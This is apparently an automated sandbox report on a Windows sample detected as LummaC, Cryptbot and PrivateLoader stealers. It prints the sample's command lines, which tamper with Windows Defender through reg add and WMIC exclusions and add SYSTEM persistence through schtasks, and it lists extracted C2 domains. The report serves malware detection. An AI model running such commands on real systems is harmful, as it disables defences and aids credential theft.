Edit tour
Windows
Analysis Report
file.exe
Overview
General Information
Detection
LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, PrivateLoader, Socks5Systemz
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Clipboard Hijacker
Yara detected Cryptbot
Yara detected LummaC Stealer
Yara detected Neoreklami
Yara detected PrivateLoader
Yara detected Socks5Systemz
.NET source code contains very large array initializations
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Creates HTML files with .exe extension (expired dropper behavior)
Drops PE files to the document folder of the user
Drops large PE files
Found API chain indicative of sandbox detection
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for dropped file
Modifies Windows Defender protection settings
Sample uses string decryption to hide its real strings
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Uses cmd line tools excessively to alter registry or file data
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64
- file.exe (PID: 7500 cmdline:
"C:\Users\ user\Deskt op\file.ex e" MD5: 731200CE89A30B22A5530838E57862F3) - conhost.exe (PID: 7508 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - RegAsm.exe (PID: 7600 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Reg Asm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13) - G__XJZ9ACVwRjgVn6BXId6E1.exe (PID: 7876 cmdline:
C:\Users\u ser\Docume nts\iofolk o5\G__XJZ9 ACVwRjgVn6 BXId6E1.ex e MD5: 18E1D0F8B01CEAE85D5D7136C4CF751A) - hI6pMK6rYY2urO_lpGyU85DA.exe (PID: 7884 cmdline:
C:\Users\u ser\Docume nts\iofolk o5\hI6pMK6 rYY2urO_lp GyU85DA.ex e MD5: 569BDA6BDE88B1E2DFEB814608202480) - hI6pMK6rYY2urO_lpGyU85DA.tmp (PID: 8020 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\is-QKC AE.tmp\hI6 pMK6rYY2ur O_lpGyU85D A.tmp" /SL 5="$70060, 2863082,54 272,C:\Use rs\user\Do cuments\io folko5\hI6 pMK6rYY2ur O_lpGyU85D A.exe" MD5: 887F3C5F3FC423C9507F5E7EA59B72DB) - playglock32x64.exe (PID: 8056 cmdline:
"C:\Users\ user\AppDa ta\Local\P lay Glock\ playglock3 2x64.exe" -i MD5: 68B9D34F203BF46CD4771604D15115BD) - Jrh6BLxH1aqS3cJle2sY_F2Q.exe (PID: 7892 cmdline:
C:\Users\u ser\Docume nts\iofolk o5\Jrh6BLx H1aqS3cJle 2sY_F2Q.ex e MD5: 5B9E9580BB4E446ABE9EDBC7556E0D32) - Install.exe (PID: 8040 cmdline:
.\Install. exe MD5: 9C515DE25DB156F66F31A9D3B1E72FC2) - Install.exe (PID: 8132 cmdline:
.\Install. exe /dXVdi diCT "3851 21" /S MD5: E40A23C70027A430F5BFC33BCE6E82F5) - cmd.exe (PID: 7212 cmdline:
"C:\Window s\System32 \cmd.exe" /C forfile s /p c:\wi ndows\syst em32 /m wh ere.exe /c "cmd /C r eg add \"H KLM\SOFTWA RE\Policie s\Microsof t\Windows Defender\T hreats\Thr eatIDDefau ltAction\" /f /v 214 7735503 /t REG_SZ /d 6" & forf iles /p c: \windows\s ystem32 /m calc.exe /c "cmd /C reg add \ "HKLM\SOFT WARE\Polic ies\Micros oft\Window s Defender \Threats\T hreatIDDef aultAction \" /f /v 2 147814524 /t REG_SZ /d 6" & fo rfiles /p c:\windows \system32 /m where.e xe /c "cmd /C reg ad d \"HKLM\S OFTWARE\Po licies\Mic rosoft\Win dows Defen der\Threat s\ThreatID DefaultAct ion\" /f / v 21477801 99 /t REG_ SZ /d 6" & forfiles /p c:\wind ows\system 32 /m wait for.exe /c "cmd /C r eg add \"H KLM\SOFTWA RE\Policie s\Microsof t\Windows Defender\T hreats\Thr eatIDDefau ltAction\" /f /v 214 7812831 /t REG_SZ /d 6" & forf iles /p c: \windows\s ystem32 /m help.exe /c "cmd /C powershel l start-pr ocess -Win dowStyle H idden gpup date.exe / force" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 7264 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - forfiles.exe (PID: 5672 cmdline:
forfiles / p c:\windo ws\system3 2 /m where .exe /c "c md /C reg add \"HKLM \SOFTWARE\ Policies\M icrosoft\W indows Def ender\Thre ats\Threat IDDefaultA ction\" /f /v 214773 5503 /t RE G_SZ /d 6" MD5: D95C443851F70F77427B3183B1619DD3) - cmd.exe (PID: 7316 cmdline:
/C reg add "HKLM\SOF TWARE\Poli cies\Micro soft\Windo ws Defende r\Threats\ ThreatIDDe faultActio n" /f /v 2 147735503 /t REG_SZ /d 6 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - reg.exe (PID: 1796 cmdline:
reg add "H KLM\SOFTWA RE\Policie s\Microsof t\Windows Defender\T hreats\Thr eatIDDefau ltAction" /f /v 2147 735503 /t REG_SZ /d 6 MD5: CDD462E86EC0F20DE2A1D781928B1B0C) - forfiles.exe (PID: 872 cmdline:
forfiles / p c:\windo ws\system3 2 /m calc. exe /c "cm d /C reg a dd \"HKLM\ SOFTWARE\P olicies\Mi crosoft\Wi ndows Defe nder\Threa ts\ThreatI DDefaultAc tion\" /f /v 2147814 524 /t REG _SZ /d 6" MD5: D95C443851F70F77427B3183B1619DD3) - cmd.exe (PID: 3716 cmdline:
/C reg add "HKLM\SOF TWARE\Poli cies\Micro soft\Windo ws Defende r\Threats\ ThreatIDDe faultActio n" /f /v 2 147814524 /t REG_SZ /d 6 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - reg.exe (PID: 6016 cmdline:
reg add "H KLM\SOFTWA RE\Policie s\Microsof t\Windows Defender\T hreats\Thr eatIDDefau ltAction" /f /v 2147 814524 /t REG_SZ /d 6 MD5: CDD462E86EC0F20DE2A1D781928B1B0C) - forfiles.exe (PID: 5768 cmdline:
forfiles / p c:\windo ws\system3 2 /m where .exe /c "c md /C reg add \"HKLM \SOFTWARE\ Policies\M icrosoft\W indows Def ender\Thre ats\Threat IDDefaultA ction\" /f /v 214778 0199 /t RE G_SZ /d 6" MD5: D95C443851F70F77427B3183B1619DD3) - cmd.exe (PID: 6580 cmdline:
/C reg add "HKLM\SOF TWARE\Poli cies\Micro soft\Windo ws Defende r\Threats\ ThreatIDDe faultActio n" /f /v 2 147780199 /t REG_SZ /d 6 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - reg.exe (PID: 5764 cmdline:
reg add "H KLM\SOFTWA RE\Policie s\Microsof t\Windows Defender\T hreats\Thr eatIDDefau ltAction" /f /v 2147 780199 /t REG_SZ /d 6 MD5: CDD462E86EC0F20DE2A1D781928B1B0C) - forfiles.exe (PID: 6844 cmdline:
forfiles / p c:\windo ws\system3 2 /m waitf or.exe /c "cmd /C re g add \"HK LM\SOFTWAR E\Policies \Microsoft \Windows D efender\Th reats\Thre atIDDefaul tAction\" /f /v 2147 812831 /t REG_SZ /d 6" MD5: D95C443851F70F77427B3183B1619DD3) - cmd.exe (PID: 7116 cmdline:
/C reg add "HKLM\SOF TWARE\Poli cies\Micro soft\Windo ws Defende r\Threats\ ThreatIDDe faultActio n" /f /v 2 147812831 /t REG_SZ /d 6 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - reg.exe (PID: 3436 cmdline:
reg add "H KLM\SOFTWA RE\Policie s\Microsof t\Windows Defender\T hreats\Thr eatIDDefau ltAction" /f /v 2147 812831 /t REG_SZ /d 6 MD5: CDD462E86EC0F20DE2A1D781928B1B0C) - forfiles.exe (PID: 6012 cmdline:
forfiles / p c:\windo ws\system3 2 /m help. exe /c "cm d /C power shell star t-process -WindowSty le Hidden gpupdate.e xe /force" MD5: D95C443851F70F77427B3183B1619DD3) - cmd.exe (PID: 1072 cmdline:
/C powersh ell start- process -W indowStyle Hidden gp update.exe /force MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - powershell.exe (PID: 5652 cmdline:
powershell start-pr ocess -Win dowStyle H idden gpup date.exe / force MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - gpupdate.exe (PID: 2192 cmdline:
"C:\Window s\system32 \gpupdate. exe" /forc e MD5: 6DC3720EA74B49C8ED64ACA3E0162AC8) - conhost.exe (PID: 2148 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - forfiles.exe (PID: 1880 cmdline:
"C:\Window s\System32 \forfiles. exe" /p c: \windows\s ystem32 /m waitfor.e xe /c "cmd /C powers hell -Wind owStyle Hi dden WMIC /NAMESPACE :\\root\Mi crosoft\Wi ndows\Defe nder PATH MSFT_MpPre ference ca ll Add Exc lusionExte nsion=exe Force=True " MD5: D95C443851F70F77427B3183B1619DD3) - conhost.exe (PID: 5372 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 7348 cmdline:
/C powersh ell -Windo wStyle Hid den WMIC / NAMESPACE: \\root\Mic rosoft\Win dows\Defen der PATH M SFT_MpPref erence cal l Add Excl usionExten sion=exe F orce=True MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - powershell.exe (PID: 1524 cmdline:
powershell -WindowSt yle Hidden WMIC /NAM ESPACE:\\r oot\Micros oft\Window s\Defender PATH MSFT _MpPrefere nce call A dd Exclusi onExtensio n=exe Forc e=True MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - WMIC.exe (PID: 3368 cmdline:
"C:\Window s\System32 \Wbem\WMIC .exe" /NAM ESPACE:\\r oot\Micros oft\Window s\Defender PATH MSFT _MpPrefere nce call A dd Exclusi onExtensio n=exe Forc e=True MD5: E2DE6500DE1148C7F6027AD50AC8B891) - schtasks.exe (PID: 5336 cmdline:
schtasks / CREATE /TN "bMvfdBTc cYfZYKRCwN " /SC once /ST 18:54 :00 /RU "S YSTEM" /TR "\"C:\Use rs\user\Ap pData\Loca l\Temp\7zS 2897.tmp\I nstall.exe \" Is /mKd idL 385121 /S" /V1 / F MD5: 48C2FE20575769DE916F48EF0676A965) - conhost.exe (PID: 4436 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - tyq3dazbB0crObgKIDGLxiAO.exe (PID: 7916 cmdline:
C:\Users\u ser\Docume nts\iofolk o5\tyq3daz bB0crObgKI DGLxiAO.ex e MD5: 83766CED82D461DE3D8D68E0B07762B8) - WerFault.exe (PID: 8180 cmdline:
C:\Windows \SysWOW64\ WerFault.e xe -u -p 7 916 -s 736 MD5: C31336C1EFC2CCB44B4326EA793040F2) - WerFault.exe (PID: 5512 cmdline:
C:\Windows \SysWOW64\ WerFault.e xe -u -p 7 916 -s 744 MD5: C31336C1EFC2CCB44B4326EA793040F2) - WerFault.exe (PID: 1824 cmdline:
C:\Windows \SysWOW64\ WerFault.e xe -u -p 7 916 -s 764 MD5: C31336C1EFC2CCB44B4326EA793040F2) - WerFault.exe (PID: 2052 cmdline:
C:\Windows \SysWOW64\ WerFault.e xe -u -p 7 916 -s 748 MD5: C31336C1EFC2CCB44B4326EA793040F2) - WerFault.exe (PID: 4316 cmdline:
C:\Windows \SysWOW64\ WerFault.e xe -u -p 7 916 -s 984 MD5: C31336C1EFC2CCB44B4326EA793040F2) - Ifh3vuF2SF2LvHombSP7ZGRi.exe (PID: 7924 cmdline:
C:\Users\u ser\Docume nts\iofolk o5\Ifh3vuF 2SF2LvHomb SP7ZGRi.ex e MD5: 447DE2327DC8ECD4830023A7D6C8ED64) - BitLockerToGo.exe (PID: 5700 cmdline:
"C:\Window s\BitLocke rDiscovery VolumeCont ents\BitLo ckerToGo.e xe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)
- svchost.exe (PID: 8092 cmdline:
C:\Windows \System32\ svchost.ex e -k WerSv cGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - WerFault.exe (PID: 8124 cmdline:
C:\Windows \SysWOW64\ WerFault.e xe -pss -s 456 -p 79 16 -ip 791 6 MD5: C31336C1EFC2CCB44B4326EA793040F2) - WerFault.exe (PID: 5880 cmdline:
C:\Windows \SysWOW64\ WerFault.e xe -pss -s 572 -p 79 16 -ip 791 6 MD5: C31336C1EFC2CCB44B4326EA793040F2) - WerFault.exe (PID: 1648 cmdline:
C:\Windows \SysWOW64\ WerFault.e xe -pss -s 584 -p 79 16 -ip 791 6 MD5: C31336C1EFC2CCB44B4326EA793040F2) - WerFault.exe (PID: 6852 cmdline:
C:\Windows \SysWOW64\ WerFault.e xe -pss -s 548 -p 79 16 -ip 791 6 MD5: C31336C1EFC2CCB44B4326EA793040F2) - WerFault.exe (PID: 7528 cmdline:
C:\Windows \SysWOW64\ WerFault.e xe -pss -s 520 -p 79 16 -ip 791 6 MD5: C31336C1EFC2CCB44B4326EA793040F2) - WerFault.exe (PID: 7560 cmdline:
C:\Windows \SysWOW64\ WerFault.e xe -pss -s 516 -p 79 16 -ip 791 6 MD5: C31336C1EFC2CCB44B4326EA793040F2)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Lumma Stealer, LummaC2 Stealer | Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. | No Attribution |
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
CryptBot | A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2. | No Attribution |
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
PrivateLoader | According to sekoia, PrivateLoader is a modular malware whose main capability is to download and execute one or several payloads. The loader implements anti-analysis techniques, fingerprints the compromised host and reports statistics to its C2 server. | No Attribution |
{"C2 url": ["drawzhotdog.shop", "gutterydhowi.shop", "ghostreedmnu.shop", "reinforcenh.shop", "fragnantbui.shop", "stogeneratmns.shop", "vozmeatillu.shop", "offensivedzvju.shop"], "Build id": "9mkWlh--RaUFPPPp"}
{"C2 list": ["ejrsoyz.ua8a"]}
{"C2 list": ["01fivevh5pt.top", "analforeverlovyu.top", "fivevh5pt.top", "+fivevh5pt.top"]}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
Windows_Trojan_Smokeloader_3687686f | unknown | unknown |
| |
JoeSecurity_Socks5Systemz | Yara detected Socks5Systemz | Joe Security | ||
Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown |
| |
Msfpayloads_msf_9 | Metasploit Payloads - file msf.war - contents | Florian Roth |
| |
JoeSecurity_Socks5Systemz | Yara detected Socks5Systemz | Joe Security | ||
Click to see the 9 entries |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems), Tim Shelton: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |